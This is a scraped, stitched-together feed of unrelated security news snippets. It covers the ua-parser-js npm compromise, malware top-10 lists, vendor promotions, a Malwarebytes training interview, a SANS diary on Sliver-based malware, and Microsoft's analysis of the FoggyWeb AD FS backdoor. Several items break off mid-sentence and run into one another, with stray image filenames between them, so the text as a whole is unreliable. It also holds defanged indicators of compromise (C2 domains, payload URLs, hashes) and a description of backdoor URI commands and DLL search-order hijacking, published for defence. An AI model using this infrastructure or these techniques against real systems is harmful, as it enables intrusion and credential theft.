1635001306_msw8_story.jpg

serve.php?o=image&a=1296

Security responders are scrambling this weekend to assess the damage from crypto-mining malware embedded in an npm package (JavaScript library) that counts close to 8 million downloads per week.

read more

securityweek?d=yIl2AUoC8zA securityweek?i=NEcCl7_4BO0:wGpg7Xi7cGE:- securityweek?d=dnMXMwOfBR0 securityweek?i=NEcCl7_4BO0:wGpg7Xi7cGE:V securityweek?d=qj6IDK7rITs securityweek?i=NEcCl7_4BO0:wGpg7Xi7cGE:g securityweek?d=TzevzKxY174 securityweek?i=NEcCl7_4BO0:wGpg7Xi7cGE:F

AVvXsEg8HqgMoSh8I0NuToWiC3CPNqgwcHQK5QIW

The U.S. Cybersecurity and Infrastructure Security Agency on Friday warned of crypto-mining malware embedded in “UAParser.js,” a popular JavaScript NPM library with over 6 million weekly downloads, days after the NPM repository moved to remove three rogue packages that were found to mimic the same library.
<!–adsense–>
The supply-chain attack targeting the open-source library saw three

flag.png

Original release date: October 22, 2021

Versions of a popular NPM package named ua-parser-js was found to contain malicious software. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. 

CISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1   

For more information, see Embedded malware in ua-parser-js.
 

This product is provided subject to this Notification and this Privacy & Use policy.

new-variant-of-updateagent-mac-malware-a

TM_logo.png

TM_logo.png

In this workshop, you will learn how to scan your objects that are being uploaded to Amazon S3 buckets for malware and integrate into your custom workflows, by automating with your current resources, directly in your AWS environment.

cropped-itsecuritynews.png

Microsoft’s analysis of a recent phishing attack shows how cybercriminals are mixing and matching to efficiently develop their attack frameworks.

youtube-cookie-stealer-malware.jpg

Analysts warn that popular online games are helping to spread malware on PCs and mobile devices.

YouTube__headpic.jpg

ThreatConnect and MalwareBazaar have partnered to deliver a new Playbook app for joint customers. MalwareBazaar is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors, and threat intelligence providers. This Playbook app will allow you to automatically detonate, analyze, and submit files in MalwareBazaar from ThreatConnect to understand if they are malicious and return any contextualized telemetry. This all leads to more informed decision-making and more efficient remediation of malicious files through automation.

ThreatConnect and MalwareBazaar: Open-Source Malware Analysis

The following capabilities are available:

Automated Malware Sandboxing

As part of a security process, you can automatically send malware to MalwareBazaar. Once sandboxed and depending on the Malware too, you can get outputs in the form of C2 communications, file hashes, registry keys, MITRE ATT&CK tags, YARA signatures, and more. You can then use these outputs to inform detection and remediation processes in the rest of your security stack.

Enrichment

As part of an investigation, you may come across a familiar file hash and want to see if you’ve seen it and sandboxed it before. You can use ThreatConnect to query MalwareBazaar and retrieve this information as part of an enrichment process during a case or investigation.

The following actions are available within the Playbook App:

Submit File
Get File Enrichment
Advanced Request

Together, ThreatConnect and MalwareBazaar help you to automate remediation tasks and protect your network from sophisticated attacks. If you’re a ThreatConnect customer, please reach out to your dedicated Customer Success Team for more information on how to install and use this Playbook app. If you’re not yet a customer and are interested in ThreatConnect and this integration, please contact us at sales@threatconnect.com.

The post ThreatConnect and MalwareBazaar: Open-Source Malware Analysis appeared first on ThreatConnect | Risk-Threat-Response.

In September 2021, the MS-ISAC observed Jupyter’s return to the Top 10 Malware list. Additionally, ZLoader made its first appearance in the Top 10. ZLoader is a modular banking trojan, based off the open source code of ZeuS. Zloader uses web injection and keystroke logging to steal sensitive financial information. Additional abilities include being able to disable Windows Defender, use living off the land techniques, and provide backdoor capabilities and act as a generic loader to deliver other forms of malware, such as ransomware. The Top 10 Malware variants comprise 74% of the total malware activity in September 2021, increasing 1% from August 2021. Shlayer and CoinMiner continue to lead the Top 10 Malware and are likely to continue their prevalence in the Top 10 Malware for the coming months.

top 10 malware september 2021 notifications

top 10 malware september 2021 pie chart

In September 2021, malvertisement accounted for the greatest number of alerts. Malvertisement continues as the top initial infection vector due to Shlayer activity. Activity levels for dropped, malspam, and malvertisement increased, while activity for multiple decreased. Shlayer and CoinMiner continue to be in the top two spots, with Shlayer activity as the only increase from the previous month. The activity from these malware is due to the education sector resuming all activity as summer vacation ended. Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater. CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.

top 10 malware september 2021 Initial infection vectors

Dropped – Malware delivered by other malware already on the system, an exploit kit, infected third-party software, or manually by a cyber threat actor. Jupyter is the only malware among the Top 10 in the dropped category.

Multiple – Malware that currently favors at least two vectors. Currently, CoinMiner, CryptoWall, Hupigon, ZeuS,  and ZLoader are the malware utilizing multiple vectors.

Malspam – Unsolicited emails, which either direct users to malicious web sites or trick users into downloading or opening malware. Top 10 Malware using this technique include Agent Tesla, Blaknight, and NanoCore.

Malvertisement – Malware introduced through malicious advertisements. Currently, Shlayer is the only Top 10 Malware using this technique.

Top 10 Malware and IOCs

Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants. Note: The associated URIs are aligned with malware’s respective domain(s) or IP(s) and increase the likelihood of maliciousness when found together. The URIs alone are not inherently malicious.

1. Shlayer

Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater.

All Shlayer domains follow the same pattern <api.random_name.com>. Below area several examples of domains Shlayer uses.

Domains

api[.]interfacecache[.]com
api[.]scalableunit[.]com
api[.]typicalconfig[.]com
api[.]standartanalog[.]com
api[.]fieldenumerator[.]com
api[.]practicalsprint[.]com
api[.]searchwebsvc[.]com
api[.]connectedtask[.]com
api[.]navigationbuffer[.]com
api[.]windowtask[.]com

2. CoinMiner

CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.

3. NanoCore

NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

4. Agent Tesla

Agent Tesla is a RAT that exfiltrate credentials, log keystrokes, and capture screenshots from an infected computer.

5. Jupyter

Jupyter is an infostealer that is downloaded by masquerading as legitimate software. It primarily targets browser data in browsers such as Chrome, Chromium, and Firefox and has full backdoor functionality.

6. Hupigon

Hupigon is a backdoor trojan that is usually dropped by other malware or is unknowingly downloaded via a malicious website. Some of this malware’s abilities include: allowing remote users to connect to the affected system and execute commands on the system, logging keystrokes, and stealing information such as credentials.

7. ZeuS

ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

8. Blaknight

Blaknight also known as HawkEye, is an Infostealer known for its keylogging capabilities for credential and banking theft.

9. CryptoWall

CryptoWall is a ransomware commonly distributed through malspam with malicious ZIP attachments, Java Vulnerabilities, and malicious advertisements. Upon successful infection, CryptoWall will scan the system for drive letters, network shares, and removable drives. CryptoWall runs on both 32-bit and 64-bit systems.

10. ZLoader

Zloader is a modular banking trojan, based off the open source code of ZeuS. Zloader uses web injection and keystroke logging to steal sensitive financial information. Additional abilities include being able to disable Windows Defender, use living off the land techniques, and provide backdoor capabilities and act as a generic loader to deliver other forms of malware, such as ransomware.

The post Top 10 Malware September 2021 appeared first on CIS.

Latest episode – listen now! (And sign up for our forthcoming Live Malware Demo at the same time.)

istock-1191661510-1.jpg

Discord, a popular VoIP, instant messaging, and digital distribution platform used by 140 million people in 2021, is being abused by cybercriminals to deploy malware files. 

Users can organize Discord servers into topic-based channels in which they can share text or voice files. They can attach any type of file within the text-based channels, including images, document files, and executables. These files are stored on Discord’s Content Delivery Network (CDN) servers. 

Introduction

On Wednesday 2021-10-20, Proofpoint reported the TA551 (Shathak) campaign started pushing malware based on Sliver.  Sliver is a framework used by red teams for adversary simluation and penetration testing.  I’ve already posted my findings on TA551’s Sliver activity from 2021-10-20.

That same day, Sliver-based malware was also being pushed by the “Stolen Images Evidence” campaign.  Today’s diary reviews a Sliver infection from the “Stolen Images Evidence” campaign.


Shown above:  Flowchart for “Stolen Images Evidence” campaign on Wednesday 2021-10-20.

Background

The “Stolen Images Evidence” campaign uses emails generated through contact forms on various websites.  So these messages don’t originate through normal spam methods.  They appear through contact form submissions describing a copyright violation to the intended victim.  These form-submitted messages include a Google-based URL in the message text.  This malicious link supposedly provides proof of stolen images that resulted in a copyright violation.

Another theme used by this same campaign is “DDoS attack Evidence” which operates in the same manner as “Stolen Images Evidence” activity.

Both campaigns push a zip archive to the web browser.  Potential victims save the zip archive, open it, and double-click the enclosed JavaScript (.js) file.  We’ve covered “Stolen Images Evidence” in a previous diary when it was pushing BazarLoader.

Malware pushed by this campaign includes BazarLoader, Gozi/ISFB/Ursnif, and IcedID (Bokbot).  Wednesday 2021-10-20 is the first time we’ve seen it push Sliver-based malware.


Shown above:  “Stolen Images Evidence” website hosted on googleapis domain on 2021-10-20.


Shown above:  Downloaded zip archive and extracted .js file.

Infection process

Below are screenshots from the infection traffic filtered in Wireshark.


Shown above:  Traffic from the infection filtered in Wireshark.


Shown above:  .js file retrieving and running he Sliver-based malware DLL.

A 10 MB malware DLL was saved to the infected user’s AppDataLocalTemp directory.  There was no apparent method of persistence, and rebooting the computer ended this particular infection.  However, if an infected host runs long enough, someone might use Sliver to download other malware and establish or maintain a presence in the victim’s environment.


Shown above:  Sliver-based malware DLL on the infected Windows host.

Indicators of Compromise (IOCs)

URL for the “Stolen Images Evidence” page:

hxxps://storage.googleapis[.]com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fnn3nv38vb3mdj.html?h=975634908970335729

Malicious domain called by the above Google URL:

104.21.91[.]115 port 443 – bacionera[.]top – HTTPS traffic

Traffic generated by Stolen Images Evidence.js file:

104.21.65[.]22 port 80 – sobolpand[.]top – GET /333g100/index.php
104.21.65[.]22 port 80 – sobolpand[.]top – GET /333g100/main.php

Post-infection traffic for Sliver-based malware:

23.81.246[.]193 port 443 – nopogew[.]com – HTTPS traffic

SHA256 hash: f136e8eebfa0c6caf9b0300ef18ed6a73fefa4e298e10620547692350c6a37c6

File size: 5,575 bytes
File name: Stolen Images Evidence.zip
File description: zip archive downloaded from “Stolen Images Evidence” page

SHA256 hash: 4894d2c2635f5186c8ca3ab79cdb6235f805e9e0ca056c5c53d70b782a92f5c3

File size: 18,362 bytes
File name: Stolen Images Evidence.js
File description: JS file extracted from Stolen Images Evidence.zip

SHA256 hash: 60a83accaa83f6db250a3529a12e916b8f1e61d3ade506fa79aa9cc3d360db21

File size: 10,572,806 bytes
File location: hxxp://sobolpand[.]top /333g100/main.php
File location: C:Users[username]AppDataLocalTempriuQtga.dat
File description: Windows DLL for SLIVER-based malware
Run method: regsvr32.exe [filename]

Using the any.run sandbox, we were able to decrypt some of the HTTPS traffic generated by the Sliver-based malware.  URLs in the HTTPS traffic from this sandbox analysis follow:

nopogew[.]com – GET /sample.txt?_=24307128
nopogew[.]com – GET /info.txt?_=43639523
nopogew[.]com – POST /admin/login.jsp?_=34297139
nopogew[.]com – GET /underscore.min.js?_=14130295
nopogew[.]com – POST /rest/login.php?_=29759540
nopogew[.]com – GET /static/underscore.min.js?_=34644478
nopogew[.]com – GET /js/underscore.min.js?_=429465
nopogew[.]com – GET /underscore.min.js?_=42953899
nopogew[.]com – GET /jquery.min.js?_=98185060
nopogew[.]com – GET /static/underscore.min.js?_=92424842
nopogew[.]com – GET /dist/underscore.min.js?_=99992372
nopogew[.]com – GET /js/underscore.min.js?_=83694471
nopogew[.]com – GET /bootstrap.min.js?_=23925416
nopogew[.]com – GET /jquery.min.js?_=69790205
nopogew[.]com – GET /underscore.min.js?_=66973448
nopogew[.]com – GET /static/bootstrap.min.js?_=16343884
nopogew[.]com – GET /dist/bootstrap.min.js?_=66112726

Final words

A packet capture (pcap) of the infection traffic and associated malware samples can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Learning Framework For Detection of Novel Malware | Avast

This post was written by the following Avast researchers:

Viliam Lisý, Avast Principal AI ScientistBranislav Bošanský, Avast Principal AI ScientistKarel Horak, Avast Senior AI ResearcherMatej Racinsky, Avast AI ResearcherPetr Somol, Avast Director AI Research

Every day, antivirus systems all over the world inspect billions of files in order to detect potential threats. For most of them, they can easily decide whether the files are malware or clean based on the reputation of the specific file or common patterns identified in known malware families. However, there is still a considerable portion of files which isn’t easy to classify based on the known patterns. These files are commonly uploaded to massive backends of antivirus systems in the cloud, where they are thoroughly analyzed based on a wide variety of methods, such as static analysis, dynamic analysis, behavioral analysis, or queries to third-party knowledge bases. Each such analysis produces a rich, diverse, and often changing set of features that indicate whether the file is malware or clean. 

virus-bulletin-old-malware-targeted-atta

Putting a precision payload on top of more generic malware makes perfect sense for malware operators

The post Virus Bulletin: Old malware never dies – it just gets more targeted appeared first on WeLiveSecurity

As part of its ongoing Consumer Main-Test Series, AV-Comparatives has released the results of its September 2021 Malware Protection Test for consumer security solutions. 17 popular anti-malware programs were evaluated to assess their ability to detect and block malicious files before, during or after execution. The test examines a product’s ability to prevent a malicious […]

Der Beitrag Consumer Malware Protection Test September 2021 erschien zuerst auf AV-Comparatives.

Webroot_Nastiest-Malware-2021_800x400Blo

Malware leaps from the darkness to envelop our lives in a cloak of stolen information, lost data and worse. But to know your enemy is to defeat your enemy. So we peered over the ledge leading to the dark web and leapt. The forces we sought are disruptors – without warning, they disturb our businesses and our connections to family and friends.

And darkness we found – from million-dollar ransoms to supply chain attacks, these malware variants were The 6 Nastiest Malware of 2021.

How malware disrupted our lives

These days, every major ransomware campaign runs a “double extortion” method, a scary prospect for small businesses. They steal and lock files away and they will absolutely leak data in the most damaging way if a ransom settlement is not reached.

Phishing continues to be key for these campaigns and it’s typically the first step in compromising a business for the nastiest malware.

This highlights the importance of user education – training users to avoid clicking these phishing lures or preventing them from enabling macros from these attachments are proven in stopping malware in its tracks.

While the list below may define payloads into different categories of malware, note that many of these bad actor groups contract work from others. This allows each group to specialize on their respective payload and perfect it.

This year’s wicked winners

Lemonduck

A persisting botnet with a cryptomining payload and moreInfects via emails, brute force, exploits and moreRemoves competing malware, ensuring they’re the only infection

REvil

The Nastiest Ransomware of 2021 that made headlines with supply chain attacksMany attempts to shutdown the REvil group have so far failedTheir ransomware as a service (RaaS) platform is on offer to other cybercriminals

Trickbot

Decade old banking and info-stealing Trojan and backdoorDisables protections, spreads laterally and eventually leads to ransomware like ContiExtremely resilient, surviving numerous attacks over the years

Dridex

Banking and info-stealing Trojan and backdoorSpreads laterally and listens for domain credentialsEventually leads to ransomware like Grief/BitPaymer/DoppelPaymer

Conti

 Longstanding ransomware group also known as Ryuk and likely linked to LockFile ransomwareTrickBot’s favorite ransomwareWill leak or auction off data if victims don’t pay the ransom

Cobalt Strike

White hat-designed pen testing tool that’s been corrupted and used for evilVery powerful features like process injection, privilege escalation and credential harvestingThe customizability and scalability are just too GOOD not to be abused by BAD actors

Victimized by malware

The good news (I guess) is that last year’s average ransom payment peaked at $200,000 and today’s average is just below $150,000.

The bad news is that hackers are spreading the love and targeting businesses of all sizes. In fact, most victims are small businesses that end up paying around $50,000. Ransomware actors are getting better with their tactics, recruiting talent and providing a streamlined user experience.

The whole process is terrifyingly simple and for every one that gets shut down, two spring up to replace it. To top it off, supply chain attacks are becoming a massive issue.

Protect yourself and your business

The key to staying safe is a layered approach to cybersecurity backed up by a cyber resilience strategy. Here are tips from our experts.

Strategies for business continuity

Lock down Remote Desktop Protocols (RDP)Educate end usersInstall reputable cybersecurity softwareSet up a strong backup and disaster recovery plan

Strategies for individuals

Develop a healthy dose of suspicion toward messagesProtect devices with antivirus and data with a VPNKeep your antivirus software and other apps up to dateUse a secure cloud backupCreate strong, unique passwords (and don’t reuse them across accounts)If a download asks to enable macros, DON’T DO IT

Discover more about 2021’s Nastiest Malware on the Webroot Community.

The post The 6 Nastiest Malware of 2021 appeared first on Webroot Blog.

MyKings Crypto Malware | Avast

There’s a lot of money in cryptocurrency these days. In addition to hobby traders, cryptocurrency has attracted the attention of legitimate investors and speculators. It’s also attracted the attention of cyber criminals, who use it for ransomware payments.

And there’s another, old fashioned way cyber criminals are interested in cryptocurrency: to steal it.

cybersecurity-training.jpg

If you hadn’t noticed by now, we are in the first week of National Cybersecurity Awareness Month, which, according to the Cybersecurity Infrastructure and Security Agency in the United States, means that we should all consider how people, organizations, and businesses can “be cyber smart” this year and ahead.

While there are countless ways to interpret exactly how to “be cyber smart”—like adopting cybersecurity best practices around strong password use, two-factor authentication, and remote desktop protocol ports—we at Malwarebytes Labs wanted to take a step back and consider: How do you train people to be cyber smart in the first place?

After all, cybersecurity training is likely the first and most important step in cybersecurity awareness, whether at home or in the office. But developing engaging, actionable cybersecurity training programs can be a difficult endeavor, as those who develop the training have to potentially meet their organization’s compliance requirements while considering their audience’s interests, needs, awareness level, and time available to actually complete training programs.

To better understand how to make smart, engaging cybersecurity training, and to help businesses everywhere roll out their own, we asked Kelsey Prichard, security awareness program manager at Malwarebytes, to share her insights. At Malwarebytes, Prichard develops the security awareness programs and compliance training for the company’s employees—which are sometimes affectionately called “Malwarenauts.” She has developed seven “microlearning modules” and one security compliance training course—with another soon to come—and she has organized multiple in-house security webinars.

Prichard’s programs have also taken advantage of what she described as a “playful culture” at Malwarebytes, as each October, she has structured the annual security training to be “based around a different popular sci-fi movie.” The themed training programs have found a perfect home at the company, as its Star Wars-themed Santa Clara headquarters includes multiple conference rooms named after popular characters and its hallways are adorned with plenty of movie art.

The following Q&A with Prichard has been edited for clarity and length.

When you first joined Malwarebytes, you were tasked with something quite intimidating: Developing a cybersecurity training program for hundreds of company employees. Where do you even start with a task this large? 

This was quite the challenge, as this role was my first formal introduction to the world of security. My background’s in learning and development, and I used to work for Tesla developing their body repair training. So much of the material was new to me. Luckily, the security team here is fantastic and gave me a lot of the security frameworks I needed to get started. I think being a “beginner” in security helped give me a clarity I’m not sure I would’ve had otherwise. The first few months consisted of a lot of Googling, online training courses, and trial and error. As I learned, I developed courses and wrote down ideas. It was extremely important to me that I didn’t start a program that people didn’t want, nor were interested in, so a huge aspect of that was learning how to make it fun. Malwarebytes has a lot of very smart individuals, and this is a security company, so I had to develop content that was interesting and yet also met compliance requirements, so everyone took training in a timely manner

How did you measure the cybersecurity familiarity of Malwarebytes employees to ensure that the training programs you built would fit their level of understanding? 

We have a huge range of security knowledge here at Malwarebytes, so we’ve tried to incorporate variability in the content we upload. Some formats, like our training modules, are catered to Malwarenauts who may have less security understanding, while others, like our monthly webinars, are more technical. We also have a Security Champions program where our security experts in the company come together to learn from each other and our security team so that they can help educate their fellow Malwarenauts. There are some things, however, like our compliance training that we need to roll out to everyone, so this needs to cover a broad spectrum of security knowledge.

How did developing these training programs specifically for employees at a cybersecurity company influence, if at all, the development process? 

Lucky for me, working at a cybersecurity company has meant more engagement in security training than you’d see at other companies. However, it also makes our mandatory trainings more difficult since we have such a broad level of security knowledge and it’s odd knowing that you may be training someone with more security knowledge than yourself. That being said, I really love that there are so many people around me that are knowledgeable and excited about cybersecurity. It means I have a lot of people to learn from and I get a lot of support from upper management, but it was definitely intimidating at first! 

When deciding what topics to prioritize, I imagine you had an enormous list. Can you describe what was on that early list? 

Yes! The first thing I needed to do was set up our first annual security training, which was easy to prioritize for compliance reasons. Cybersecurity Awareness Month was also a big priority because I used it as the launch of our security awareness program and it’s the optimal time to make a big deal of cybersecurity. Creating a plan for the year on topics to be covered was also very helpful, as it allowed for getting the expert speakers for those topics. It requires a lot of coordination.

How did you narrow down the first few topics you developed training programs for? Why did you choose those topics? 

My security teammates were hugely valuable. They were aware of the biggest threats to our organization, so I initially developed training to highlight and help our employees prevent these threats from occurring. From there, we really wanted to cover the “cybersecurity basics” to set a knowledge groundwork for all employees.  

In developing the training programs, was there any practice you knew you wanted to avoid? 

I am very aware that “learning fatigue” is easy to succumb to with mandatory training modules. Because of this, I wanted to ensure that all training programs were split up to take no longer than 15 minutes at a time. This is why you’ll see our mandatory training is 30 minutes in total, but is split into three separate courses that are combined into one learning plan. This gives learners the option to complete a course and return to the learning plan as needed.

I also aim for story-based training, where it makes sense, to simplify otherwise complex content and make it relatable. 

Finally, what is your top tip for other cybersecurity trainers who want to make smart training progrmas for their organizations? 

Keep it engaging. I think as cybersecurity trainers we tend to get wrapped up in what the content is and forget how crucial it is to make the learning entertaining. If your audience doesn’t engage in the training you create, all it’s doing is checking a compliance box. 

The post Making better cybersecurity training: Q&A with Malwarebytes expert Kelsey Prichard appeared first on Malwarebytes Labs.

Actors%20Target%20Huawei%20Cloud%20Using

In this article, we discuss a new Linux malware trend in which malicious actors deploy code that removes applications and services present mainly in Huawei Cloud.

Check Point Research reports that Trickbot is the most prevalent malware while remote access trojan, njRAT, has entered the index for the first time. Our latest Global Threat Index for September 2021 has revealed that Trickbot has returned to the top of the most prevalent malware list having fallen into second place in August following…

The post September 2021’s Most Wanted Malware: Trickbot Once Again Tops the List appeared first on Check Point Software.

ThreatConnect and Cuckoo Sandbox have partnered to deliver a new Playbook app for joint customers. This Playbook app will allow you to automatically detonate, analyze, and submit files and URLs in Cuckoo Sandbox from ThreatConnect to understand if they are malicious and return any contextualized telemetry. This all leads to more informed decision-making and more efficient remediation of malicious files through automation.

ThreatConnect and Cuckoo Sandbox: Automate your Malware Analysis

Cuckoo Sandbox

The following capabilities are available:

Automated Malware Sandboxing

As part of a security process, you can automatically send malware to Cuckoo Sandbox. Once sandboxed and depending on the Malware too, you can get outputs in the form of C2 communications, file hashes, registry keys, MITRE ATT&CK tags, YARA signatures, and more. You can then use these outputs to inform detection and remediation processes in the rest of your security stack.

Enrichment

As part of an investigation, you may come across a familiar file hash and want to see if you’ve seen it and sandboxed it before. You can use ThreatConnect to query Cuckoo Sandbox and retrieve this information as part of an enrichment process during a case or investigation.

The following actions are available within the Playbook App:

Submit File
Submit URL
Get File Enrichment
Advanced Request

Together, ThreatConnect and Cuckoo Sandbox helps you to automate remediation tasks and protect your network from sophisticated attacks. If you’re a ThreatConnect customer, please reach out to your dedicated Customer Success Team for more information on how to install and use this Playbook app. If you’re not yet a customer and are interested in ThreatConnect and this integration, please contact us at sales@threatconnect.com.

The post ThreatConnect and Cuckoo Sandbox: Automate your Malware Analysis appeared first on ThreatConnect | Risk-Threat-Response.

Microsoft continues to work with partners and customers to track and expand our knowledge of the threat actor we refer to as NOBELIUM, the actor behind the SUNBURST backdoor, TEARDROP malware, and related components. As we stated before, we suspect that NOBELIUM can draw from significant operational resources often showcased in their campaigns, including custom-built malware and tools. In March 2021, we profiled NOBELIUM’s GoldMax, GoldFinder, and Sibot malware, which it uses for layered persistence. We then followed that up with another post in May, when we analyzed the actor’s early-stage toolset comprising EnvyScout, BoomBox, NativeZone, and VaporRage.

This blog is another in-depth analysis of newly detected NOBELIUM malware: a post-exploitation backdoor that Microsoft Threat Intelligence Center (MSTIC) refers to as FoggyWeb. As mentioned in previous blogs, NOBELIUM employs multiple tactics to pursue credential theft with the objective of gaining admin-level access to Active Directory Federation Services (AD FS) servers. Once NOBELIUM obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools. NOBELIUM uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing certificate, and token-decryption certificate, as well as to download and execute additional components. Use of FoggyWeb has been observed in the wild as early as April 2021.

Microsoft has notified all customers observed being targeted or compromised by this activity. If you believe your organization has been compromised, we recommend that you

Audit your on-premises and cloud infrastructure, including configuration, per-user and per-app settings, forwarding rules, and other changes the actor might have made to maintain their access
Remove user and app access, review configurations for each, and re-issue new, strong credentials following documented industry best practices.
Use a hardware security module (HSM) as described in securing AD FS servers to prevent the exfiltration of secrets by FoggyWeb.

Microsoft security products have implemented detections and protections against this malware. Indicators of compromise (IOCs), mitigation guidance, detection details, and hunting queries for Azure Sentinel and Microsoft 365 Defender customers are provided at the end of this analysis and in the product portals. Active Directory Federation Services (AD FS) servers run on-premises and customers can also follow detailed guidance on securing AD FS servers against attacks.

FoggyWeb: Backdoor targeting AD FS

FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server.

After compromising an AD FS server, NOBELIUM was observed dropping the following two files on the system (administrative privileges are required to write these files to the  folders listed below):

%WinDir%ADFSversion.dll
%WinDir%SystemResourcesWindows.Data.TimeZonesprisWindows.Data.TimeZones.zh-PH.pri

FoggyWeb is stored in the encrypted file Windows.Data.TimeZones.zh-PH.pri, while the malicious file version.dll can be described as its loader. The AD FS service executable Microsoft.IdentityServer.ServiceHost.exe loads the said DLL file via the DLL search order hijacking technique that involves the core Common Language Runtime (CLR) DLL files (described in detail in the FoggyWeb loader section). This loader is responsible for loading the encrypted FoggyWeb backdoor file and utilizing a custom Lightweight Encryption Algorithm (LEA) routine to decrypt the backdoor in memory.

After de-obfuscating the backdoor, the loader proceeds to load FoggyWeb in the execution context of the AD FS application. The loader, an unmanaged application, leverages the CLR hosting interfaces and APIs to load the backdoor, a managed DLL, in the same Application Domain within which the legitimate AD FS managed code is executed. This grants the backdoor access to the AD FS codebase and resources, including the AD FS configuration database (as it inherits the AD FS service account permissions required to access the configuration database).

Diagram showing structure of Microsoft.IdentityServer.ServiceHost.exe after loading version.dll

When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target’s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target):

HTTP GET URI pattern:

/adfs/portal/images/theme/light01/profile.webp
/adfs/portal/images/theme/light01/background.webp
/adfs/portal/images/theme/light01/logo.webp

HTTP POST URI pattern:

/adfs/services/trust/2005/samlmixed/upload

Each HTTP GET/POST URI pattern above corresponds to a C2 command:

When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/profile.webp, the backdoor retrieves the token signing certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
Similarly, when the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/background.webp, the backdoor retrieves the token decryption certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/logo.webp, the backdoor retrieves the AD FS configuration data of the compromised server, obfuscates the data, and returns the obfuscated data to the issuer of the request.
When the AD FS server receives an HTTP POST request containing the URI pattern /adfs/services/trust/2005/samlmixed/upload, the backdoor treats the obfuscated and compressed POST data as either .NET assembly or source code. If assembly, the backdoor executes the assembly in the execution context of the AD FS process. If source code, the backdoor dynamically compiles the source code and proceeds to execute the resulting memory-resident assembly in the execution context of the AD FS process.

The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server.

Diagram showing FoggyWeb attack chain

Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account. Also, because FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects, and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations. For example, this allows FoggyWeb to gain access to the AD FS configuration data without connecting to the WID named pipe or manually running SQL queries to retrieve configuration information (for example, to obtain the EncryptedPfx blob from the configuration data). FoggyWeb is also AD FS version-agnostic; it does not need to keep track of legacy versus modern configuration table names and schemas, named pipe names, and other version-dependent properties of AD FS.

FoggyWeb loader

The file version.dll is a malicious loader responsible for loading an encrypted backdoor file from the file system, decrypting the backdoor file, and loading it in memory. This malicious DLL, which shares a name with a legitimate Windows DLL located in the %WinDir%System32 folder, is meant to be placed in the main AD FS folder %WinDir%ADFS, where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located (for reasons described later in this section).

When the AD FS service (adfssrv) is started, the service executable Microsoft.IdentityServer.ServiceHost.exe gets executed. As a .NET-based managed application, Microsoft.IdentityServer.ServiceHost.exe imports an unmanaged Windows DLL named mscoree.dll.

Screenshot showing Microsoft.IdentityServer.ServiceHost.exe importing mscoree.dll.

The file mscoree.dll dynamically loads another unmanaged Windows/CLR DLL named mscoreei.dll. As shown below, mscoreei.dll has a delay load import (Delay Import) named version.dll.

Screenshot showing mscoreei.dll has a delay load import (Delay Import) named version.dll

NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%ADFS folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll. Once loaded, instead of loading the legitimate version.dll from the %WinDir%System32 folder mscoreei.dll loads the malicious version.dll planted by the attacker in %WinDir%ADFS folder (referred to as DLL search order hijacking), as shown in the call stack below.

Screenshot of call stack showing folder mscoreei.dll loads the malicious version.dll planted by the attacker in %WinDir%ADFS folder

